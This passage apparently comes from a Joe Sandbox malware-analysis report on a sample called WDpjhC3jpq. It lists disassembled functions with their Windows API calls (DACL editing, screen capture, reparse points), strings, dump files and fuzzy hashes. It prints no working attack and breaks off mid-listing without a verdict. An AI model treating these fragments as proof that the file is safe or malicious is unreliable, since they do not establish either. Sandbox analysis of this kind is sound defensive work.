4+-, xrefs: 0025CC96
CLASSNN, xrefs: 0025CC33
P+-, xrefs: 0025CD43

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: ChildEnumWindows
String ID: 4+-$CLASS$CLASSNN$H+-$INSTANCE$L+-$NAME$P+-$REGEXPCLASS$T+-$TEXT
API String ID: 3555792229-941370078
Opcode ID: 74ac5cf68f0ccc48b8eae6cd0cc6d9119bb27cf3e109a661ec84b735917fbf69
Instruction ID: b8c8a113c08b18712c8b83e05351a4cf65257abfb713b68884c0d659e122a14f
Opcode Fuzzy Hash: 74ac5cf68f0ccc48b8eae6cd0cc6d9119bb27cf3e109a661ec84b735917fbf69
Instruction Fuzzy Hash: D3917270520606AECB18DFA0C482BEDFB75BF04305F60851ADC49A7291EF70A97ECB94

Function 0028E4F5 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0028E5AB
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,0028BEAF), ref: 0028E607
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0028E647
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0028E68C
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0028E6C3
FreeLibrary.KERNEL32(?,00000004,?,?,?,?,0028BEAF), ref: 0028E6CF
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0028E6DF
DestroyIcon.USER32(?,?,?,?,?,0028BEAF), ref: 0028E6EE
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0028E70B
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0028E717

Part of subcall function 00240FA7: __wcsicmp_l.LIBCMT ref: 00241030

Strings

.dll, xrefs: 0028E564
.icl, xrefs: 0028E521
.exe, xrefs: 0028E541

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: e54216558e45e8772bb6157d5d7055babf46d270b0d0f6b0106ecd297268fa67
Instruction ID: 7a3eaf2d0c6a1a8396c29611686f89c98f573d298d2082116f67edea2c773e80
Opcode Fuzzy Hash: e54216558e45e8772bb6157d5d7055babf46d270b0d0f6b0106ecd297268fa67
Instruction Fuzzy Hash: 1C61D171520225FBEF24EF64DC85FAE77ACAB18714F104106F911E61D0EB7499A0CB60

Function 0026D219 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 0022936C: __swprintf.LIBCMT ref: 002293AB
Part of subcall function 0022936C: __itow.LIBCMT ref: 002293DF

CharLowerBuffW.USER32(?,?), ref: 0026D292
GetDriveTypeW.KERNEL32 ref: 0026D2DF
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0026D327
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0026D35E
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0026D38C

Strings

open, xrefs: 0026D2B9
closed, xrefs: 0026D2A6, 0026D2AF
close, xrefs: 0026D298
wait, xrefs: 0026D349
close cd wait, xrefs: 0026D377
open , xrefs: 0026D2EE
type cdaudio alias cd wait, xrefs: 0026D30A
set cd door , xrefs: 0026D32D

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 1148790751-4113822522
Opcode ID: 8799040781bb6d631954711c35df40919803dcf106de59cdb7907de1b8db3b6c
Instruction ID: d68e102fe7b89081ce7b2f9d823ad21be9272e2c342c855b94eda963d06328f8
Opcode Fuzzy Hash: 8799040781bb6d631954711c35df40919803dcf106de59cdb7907de1b8db3b6c
Instruction Fuzzy Hash: 8F513B71624315AFC700EF10D88196EB7E4EF98718F10886DF896672A1DB31EE29CF52

Function 002626BC Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00293973,00000016,0000138C,00000016,?,00000016,002BDDB4,00000000,?), ref: 002626F1
LoadStringW.USER32(00000000,?,00293973,00000016), ref: 002626FA
GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00293973,00000016,0000138C,00000016,?,00000016,002BDDB4,00000000,?,00000016), ref: 0026271C
LoadStringW.USER32(00000000,?,00293973,00000016), ref: 0026271F
__swprintf.LIBCMT ref: 0026276F
__swprintf.LIBCMT ref: 00262780
_wprintf.LIBCMT ref: 00262829
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00262840

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00262824
Line %d:, xrefs: 0026277A
Error: , xrefs: 002627F7
^ ERROR, xrefs: 002627D5
Line %d (File "%s"):, xrefs: 00262769

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 618562835-2268648507
Opcode ID: 0305517363e22ac15c6136442dc83d2e166d18681e5ba3840d7a30242c3bfe9b
Instruction ID: 0261510fa346cdfadb3fac681b544f8b01f14b92b7101d8b2217bcde8a8c4bef
Opcode Fuzzy Hash: 0305517363e22ac15c6136442dc83d2e166d18681e5ba3840d7a30242c3bfe9b
Instruction Fuzzy Hash: B8415E72810229BACB14FBE0EE86DEEB778AF15344F500065B50677092EA746F79CF61

Function 0026D0B8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0026D0D8
__swprintf.LIBCMT ref: 0026D0FA
CreateDirectoryW.KERNEL32(?,00000000), ref: 0026D137
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0026D15C
_memset.LIBCMT ref: 0026D17B
_wcsncpy.LIBCMT ref: 0026D1B7
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0026D1EC
CloseHandle.KERNEL32(00000000), ref: 0026D1F7
RemoveDirectoryW.KERNEL32(?), ref: 0026D200
CloseHandle.KERNEL32(00000000), ref: 0026D20A

Strings

\??\%s, xrefs: 0026D0F4
:, xrefs: 0026D11B
\, xrefs: 0026D110

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: 657e610e3f8f991d6fb843df02bb9adcb2321bf2c2e8a6b48cf8bb46990921dd
Instruction ID: be9834cea85edc95201992a7d752c5823a61420ea2c5a3238a0b7c11e02bb264
Opcode Fuzzy Hash: 657e610e3f8f991d6fb843df02bb9adcb2321bf2c2e8a6b48cf8bb46990921dd
Instruction Fuzzy Hash: E6319472A1010AABDB21DFA0DC49FEB77BCEF89740F5040B6F909D2161EB7096958F24

Function 0028E731 Relevance: 22.6, APIs: 15, Instructions: 129filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0028BEF4,?,?), ref: 0028E754
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0028BEF4,?,?,00000000,?), ref: 0028E76B
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0028BEF4,?,?,00000000,?), ref: 0028E776
CloseHandle.KERNEL32(00000000,?,?,?,?,0028BEF4,?,?,00000000,?), ref: 0028E783
GlobalLock.KERNEL32(00000000), ref: 0028E78C
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0028BEF4,?,?,00000000,?), ref: 0028E79B
GlobalUnlock.KERNEL32(00000000), ref: 0028E7A4
CloseHandle.KERNEL32(00000000,?,?,?,?,0028BEF4,?,?,00000000,?), ref: 0028E7AB
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0028BEF4,?,?,00000000,?), ref: 0028E7BC
OleLoadPicture.OLEAUT32(?,00000000,00000000,002AD9BC,?), ref: 0028E7D5
GlobalFree.KERNEL32(00000000), ref: 0028E7E5
GetObjectW.GDI32(00000000,00000018,?), ref: 0028E809
CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0028E834
DeleteObject.GDI32(00000000), ref: 0028E85C
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0028E872

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: f85ad553e35d149fcd54707eb0ebcca522067c06689d07ed3826dd87736d5c9a
Instruction ID: 6c32ceb3d53bdfd9b08a2c552ceae1aaedb2ce0c48ab9a66531353e6891a2898
Opcode Fuzzy Hash: f85ad553e35d149fcd54707eb0ebcca522067c06689d07ed3826dd87736d5c9a
Instruction Fuzzy Hash: 13414A75601205EFDB119F65EC4CEAEBBB9EF8A711F108058F90AD72A1DB309D41DB20

Function 002705F8 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 0027076F
_wcscat.LIBCMT ref: 00270787
_wcscat.LIBCMT ref: 00270799
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 002707AE
SetCurrentDirectoryW.KERNEL32(?), ref: 002707C2
GetFileAttributesW.KERNEL32(?), ref: 002707DA
SetFileAttributesW.KERNEL32(?,00000000), ref: 002707F4
SetCurrentDirectoryW.KERNEL32(?), ref: 00270806

Strings

*.*, xrefs: 00270845

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: 2e46f6ffce8a636cb3ffa692dc6bb469ce4a68261981e4387c6162932b23b781
Instruction ID: 39299be1ec2bcdb39a1139d52f4acca787e48e6fa98fb6f46e2c4bd2a185c179
Opcode Fuzzy Hash: 2e46f6ffce8a636cb3ffa692dc6bb469ce4a68261981e4387c6162932b23b781
Instruction Fuzzy Hash: E1819271524302DFCB24DF64C89596EB3E8BBC9304F14882EF889C7251EA70E9688F52

Function 0028EEEB Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0023B34E: GetWindowLongW.USER32(?,000000EB), ref: 0023B35F

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0028EF3B
GetFocus.USER32 ref: 0028EF4B
GetDlgCtrlID.USER32(00000000), ref: 0028EF56
_memset.LIBCMT ref: 0028F081
GetMenuItemInfoW.USER32 ref: 0028F0AC
GetMenuItemCount.USER32(00000000), ref: 0028F0CC
GetMenuItemID.USER32(?,00000000), ref: 0028F0DF
GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0028F113
GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0028F15B
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0028F193
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0028F1C8

Strings

0, xrefs: 0028F079

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: 0a6df3b40f7ecd2eedd3e75b6903908ff3a0b1e7fed8e3520117ab981445cad2
Instruction ID: 278258c6c272edfb0b53cfae0e04eb809e0495217e79a65f8337cff5a2ee6260
Opcode Fuzzy Hash: 0a6df3b40f7ecd2eedd3e75b6903908ff3a0b1e7fed8e3520117ab981445cad2
Instruction Fuzzy Hash: 8E81A074626302EFDB10EF14D988A6BBBE8FB88314F00452DF99997291D770D821CF62

Function 0025A867 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0025ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0025ABD7
Part of subcall function 0025ABBB: GetLastError.KERNEL32(?,0025A69F,?,?,?), ref: 0025ABE1
Part of subcall function 0025ABBB: GetProcessHeap.KERNEL32(00000008,?,?,0025A69F,?,?,?), ref: 0025ABF0
Part of subcall function 0025ABBB: HeapAlloc.KERNEL32(00000000,?,0025A69F,?,?,?), ref: 0025ABF7
Part of subcall function 0025ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0025AC0E

Part of subcall function 0025AC56: GetProcessHeap.KERNEL32(00000008,0025A6B5,00000000,00000000,?,0025A6B5,?), ref: 0025AC62
Part of subcall function 0025AC56: HeapAlloc.KERNEL32(00000000,?,0025A6B5,?), ref: 0025AC69
Part of subcall function 0025AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0025A6B5,?), ref: 0025AC7A

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0025A8CB
_memset.LIBCMT ref: 0025A8E0
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0025A8FF
GetLengthSid.ADVAPI32(?), ref: 0025A910
GetAce.ADVAPI32(?,00000000,?), ref: 0025A94D
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0025A969
GetLengthSid.ADVAPI32(?), ref: 0025A986
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0025A995
HeapAlloc.KERNEL32(00000000), ref: 0025A99C
GetLengthSid.ADVAPI32(?,00000008,?), ref: 0025A9BD
CopySid.ADVAPI32(00000000), ref: 0025A9C4
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0025A9F5
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0025AA1B
SetUserObjectSecurity.USER32(?,00000004,?), ref: 0025AA2F

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: e3fd9250ef267293a0989751f8acec4616aa551564fcdc3f49c0c52d684e387e
Instruction ID: 93e67bf922837c174df805feaa1c890dadb01557ae5277b9766b492a5955ccbd
Opcode Fuzzy Hash: e3fd9250ef267293a0989751f8acec4616aa551564fcdc3f49c0c52d684e387e
Instruction Fuzzy Hash: 9B516E7191020AAFDF10DF90DD4AEEEBB79FF05301F04821AF916A7290DB349A19CB65

Function 00279DC1 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 159windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00279E36
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00279E42
CreateCompatibleDC.GDI32(?), ref: 00279E4E
SelectObject.GDI32(00000000,?), ref: 00279E5B
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00279EAF
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00279EEB
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00279F0F
SelectObject.GDI32(00000006,?), ref: 00279F17
DeleteObject.GDI32(?), ref: 00279F20
DeleteDC.GDI32(00000006), ref: 00279F27
ReleaseDC.USER32(00000000,?), ref: 00279F32

Strings

(, xrefs: 00279ED7

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: a9541e1526a4d60b4a53bf2bd8b52af9123aeaa7b9d7e5c6c34d7c999487f5a0
Instruction ID: 12293832ba36a2857aae9b771e1cd722d8bf77f80f266cc4eedc216f8b1534e9
Opcode Fuzzy Hash: a9541e1526a4d60b4a53bf2bd8b52af9123aeaa7b9d7e5c6c34d7c999487f5a0
Instruction Fuzzy Hash: 80513875900309AFCB14CFA8D889EAEBBB9EF49710F14841DF95AA7610D731A941CB90

Function 0026CC5C Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 155COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF), ref: 0026CCA3
LoadStringW.USER32(?,?,00000FFF,?), ref: 0026CCC5
__swprintf.LIBCMT ref: 0026CD1E
__swprintf.LIBCMT ref: 0026CD37
_wprintf.LIBCMT ref: 0026CDED
_wprintf.LIBCMT ref: 0026CE0B

Strings

Error: , xrefs: 0026CDB5
^ ERROR, xrefs: 0026CD8F
"%s" (%d) : ==> %s:, xrefs: 0026CE06
"%s" (%d) : ==> %s:%s%s, xrefs: 0026CDE8
Line %d (File "%s"):, xrefs: 0026CD18, 0026CD31

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: LoadString__swprintf_wprintf
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 2889450990-2391861430
Opcode ID: 8ad13a32f73b765a7190ad74540c6dc5b9c0258e29ce17e477053aca45a3330b
Instruction ID: 94b70dad776885b112d371ab3f69af645e73308740b3d5cc1017e562907219d2
Opcode Fuzzy Hash: 8ad13a32f73b765a7190ad74540c6dc5b9c0258e29ce17e477053aca45a3330b
Instruction Fuzzy Hash: CF518F31820119BACB15FBE0ED86EEEB778AF05304F204065F505761A2EB716EB9DF61

Function 0026CA48 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 151COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 0026CA8F
LoadStringW.USER32(00000072,?,00000FFF,?), ref: 0026CAB0
__swprintf.LIBCMT ref: 0026CB09
__swprintf.LIBCMT ref: 0026CB22
_wprintf.LIBCMT ref: 0026CBCD
_wprintf.LIBCMT ref: 0026CBEB

Strings

Error: , xrefs: 0026CB95
"%s" (%d) : ==> %s:, xrefs: 0026CBE6
^ ERROR , xrefs: 0026CB64
"%s" (%d) : ==> %s:%s%s, xrefs: 0026CBC8
Line %d (File "%s"):, xrefs: 0026CB03, 0026CB1C

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: LoadString__swprintf_wprintf
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 2889450990-3420473620
Opcode ID: 73d5084017b7d32c428e898ced426a36705d874a3c2a9cb78bd64b0064e8c46d
Instruction ID: d723d025931cd8ec9e257141840cda641514c0ea346e16e120605a7bc331896c
Opcode Fuzzy Hash: 73d5084017b7d32c428e898ced426a36705d874a3c2a9cb78bd64b0064e8c46d
Instruction Fuzzy Hash: C551B031820119BACB14FBE0ED46EEEB778AF04304F204066B405761A2EB746FB9CF61

Function 00283C06 Relevance: 21.1, APIs: 1, Strings: 11, Instructions: 109COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00282BB5,?,?), ref: 00283C1D

Strings

HKCR, xrefs: 00283CAB
HKCU, xrefs: 00283CF3
HKU, xrefs: 00283D15
$E-, xrefs: 00283C36
HKEY_USERS, xrefs: 00283D04
HKEY_CURRENT_CONFIG, xrefs: 00283CC0
HKEY_CURRENT_USER, xrefs: 00283CE2
HKEY_CLASSES_ROOT, xrefs: 00283C96
HKLM, xrefs: 00283C81
HKEY_LOCAL_MACHINE, xrefs: 00283C6C
HKCC, xrefs: 00283CD1

Memory Dump Source

Source File: 00000000.00000002.2157040657.0000000000221000.00000020.00000001.01000000.00000003.sdmp, Offset: 00220000, based on PE: true

Associated: 00000000.00000002.2157017919.0000000000220000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157105298.00000000002CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157155524.00000000002DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157181019.00000000002E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_220000_WDpjhC3jpq.jbxd

Similarity

API ID: BuffCharUpper
String ID: $E-$HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-389935625
Opcode ID: 831fdc08b3136bae8d0cf5b1f9a190980d2d1deeeba19db0eb18e0d6a22f0e41
Instruction ID: 27a8d79c21c4ca42db95a60fb973c286935933961a9a5d847ea47535e0bba7f2
Opcode Fuzzy Hash: 831fdc08b3136bae8d0cf5b1f9a190980d2d1deeeba19db0eb18e0d6a22f0e41
Instruction Fuzzy Hash: 2341407513124A9BCF04FF10E851AEE3365AF22B40F515856EC552B2D2EB70AE3ACF50

Function 002655BD Relevance: 19.7, APIs: 13, Instructions: 213windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 002655D7
